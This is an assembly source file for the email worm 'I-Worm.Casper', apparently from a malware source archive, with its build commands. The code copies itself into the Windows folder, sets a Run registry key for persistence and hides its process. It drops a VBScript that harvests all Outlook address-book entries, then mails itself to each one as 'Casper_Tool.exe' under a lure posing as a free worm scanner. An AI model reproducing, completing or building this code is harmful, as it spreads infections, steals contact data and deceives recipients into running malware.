MalwareSourceCode/Win32/InternetWorm/I-Worm.Casper.asm
2020-10-16 23:26:21 +02:00

510 lines
8.6 KiB
NASM

;--- dllz.def
IMPORTS
WININET.InternetGetConnectedState
SHLWAPI.SHSetValueA
;---
comment #
Name : I-Worm.Casper
Author : PetiK
Date : August 17th - August 24th
Size : 6144 byte (compressed with UPX tool)
Action : Copy itself to
* WINDOWS\MsWinsock32.exe
Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
* Winsock32 1.0 = WINDOWS\MsWinsock32.exe
To build the worm:
tasm32 /ml /m9 Casper
tlink32 -Tpe -c -x -aa Casper,,,import32,dllz
upx -9 Casper.exe
To delete the worm:
del %windir%\MsWinsock32.exe
del %windir%\CasperEMail.txt
dllz.def file:
IMPORTS
WININET.InternetGetConnectedState
SHLWAPI.SHSetValueA
#
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
DEBUT:
Main_Worm:
call Hide_Worm
call Copy_Worm
call Check_Wsock
call Prepare_Spread_Worm
Connected_:
push 00h
push offset Tmp
callx InternetGetConnectedState
dec eax
jnz Connected_
mov edi,offset casper_mail
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"saC\"
stosd
mov eax,"Erep"
stosd
mov eax,"liaM"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd
call Spread_Worm
Hide_Worm proc
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx
jecxz End_Hide
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz End_Hide
push 1
push 0
call ecx
End_Hide:
popad
ret
Hide_Worm endp
Check_Wsock proc
Search_Wsock:
push 50
mov edi,offset wsock_file
push edi
callx GetSystemDirectoryA
add edi,eax
mov eax,"osW\"
stosd
mov eax,"23kc"
stosd
mov eax,"lld."
stosd
xor eax,eax
stosd
push offset wsock_file
callx GetFileAttributesA
cmp eax,20h
jne End_Wsock
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset wsock_file
callx CreateFileA
mov wsckhdl,eax
File_Mapping:
xor eax,eax
push eax
push eax
push eax
push 04h
push eax
push wsckhdl
callx CreateFileMappingA
test eax,eax
jz Close_File
mov wsckmap,eax
xor eax,eax
push eax
push eax
push eax
push 06h
push wsckmap
callx MapViewOfFile
test eax,eax
jz Close_Map_File
mov esi,eax
mov wsckview,eax
Old_Infect:
mov verif,0
cmp word ptr [esi],"ZM"
jne UnmapView_File
cmp byte ptr [esi+12h],"z"
je Infected_By_Happy
cmp word ptr [esi+38h],"ll"
je Infected_By_Icecubes
jmp UnmapView_File
Infected_By_Happy:
push 10h
push offset warning
@pushsz "I-Worm.Happy coded by Spanska"
push 00h
callx MessageBoxA
inc verif
jmp UnmapViewOfFile
Infected_By_Icecubes:
push 10h
push offset warning
@pushsz "I-Worm.Icecubes coded by f0re"
push 00h
callx MessageBoxA
inc verif
jmp UnmapViewOfFile
Already_Infected:
inc verif
jmp UnmapViewOfFile
UnmapView_File:
push wsckview
callx UnmapViewOfFile
Close_Map_File:
push offset wsckmap
callx CloseHandle
Close_File:
push wsckhdl
callx CloseHandle
End_Wsock:
ret
Check_Wsock endp
Copy_Worm proc
pushad
Original_Name:
push 50
mov esi,offset original
push esi
push 0
callx GetModuleFileNameA
Copy_Name:
mov edi,offset copy_name
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,'WsM\'
stosd
mov eax,'osni'
stosd
mov eax,'23kc'
stosd
mov eax,'exe.'
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA
Reg_Registered:
push 08h
push edi
push 01h
@pushsz "Winsock32"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA
push 08h
@pushsz "PetiK - France - (c)2001"
push 01h
@pushsz "Author"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
push 08h
@pushsz "1.00"
push 01h
@pushsz "Version"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
popad
ret
Copy_Worm endp
Prepare_Spread_Worm proc
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\CasperMail.vbs"
callx CreateFileA
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
push 1
@pushsz "wscript C:\CasperMail.vbs"
callx WinExec
push 3 * 1000
callx Sleep
@pushsz "C:\CasperMail.vbs"
callx DeleteFileA
popad
ret
Prepare_Spread_Worm endp
Spread_Worm:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset casper_mail
callx CreateFileA
inc eax
test eax,eax
je End_Spread_worm
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
cmp eax,03h
jbe F3
call Scan_Mail
F3: push esi
callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
End_Spread_worm:
popad
ret
Scan_Mail:
pushad
xor edx,edx
mov edi,offset m_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,"@"
je not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je Scan_Mail
call Send_Mail
jmp Scan_Mail
entr2: xor al,al
stosb
pop edi
jmp Scan_Mail
f_mail:
FIN: push 00h
callx ExitProcess
Send_Mail:
xor eax,eax
push eax
push eax
push eax
push offset Message
push [MAPIHdl]
callx MAPISendMail
ret
.data
; ===== Main_Worm =====
wsock_file db 50 dup (0)
; ===== Check_Wsock =====
wsckhdl dd 0
wsckmap dd 0
wsckview dd 0
PEHeader dd 0
warning db "Warning : You're infected by",00h
verif dd ?
; ===== Copy_Worm =====
original db 50 dup (0)
copy_name db 50 dup (0)
; ===== Prepare_Spread_Worm =====
octets dd ?
; ===== Spread_Worm =====
m_addr db 128 dup (?)
casper_mail db 50 dup (0)
mail_name db "Casper_Tool.exe",00h
MAPIHdl dd 0
Tmp dd 0
subject db "Casper Tool Protect 1.00",00h
body db "Hi,",0dh,0ah
db "Look at this attachment...",0dh,0ah
db "This freeware alert you if you infected by "
db "I-Worm.Happy and I-Worm.Icecubes.",0dh,0ah
db "These worms spread with the file WSOCK32.DLL in the SYSTEM path.",0dh,0ah
db "The tool Casper v.1.00 scans this specific file and displays a message "
db "if it infected.",0dh,0ah,0dh,0ah,0dh,0ah
db 09h,09h,09h,"Good Bye and have a nice day",00h
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset m_addr
dd offset m_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset original
dd offset mail_name
dd ?
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set Casper = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = Casper.GetNameSpace("MAPI")',0dh,0ah
db 'Set fs=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set c=fs.CreateTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt")',0dh,0ah
db 'c.Close',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine P.Address',0dh,0ah
db 'c.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine "#"',0dh,0ah
db 'c.Close',0dh,0ah
VBSSIZE = $-vbsd
MAX_PATH equ 260
FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends
Search WIN32_FIND_DATA <>
end DEBUT
end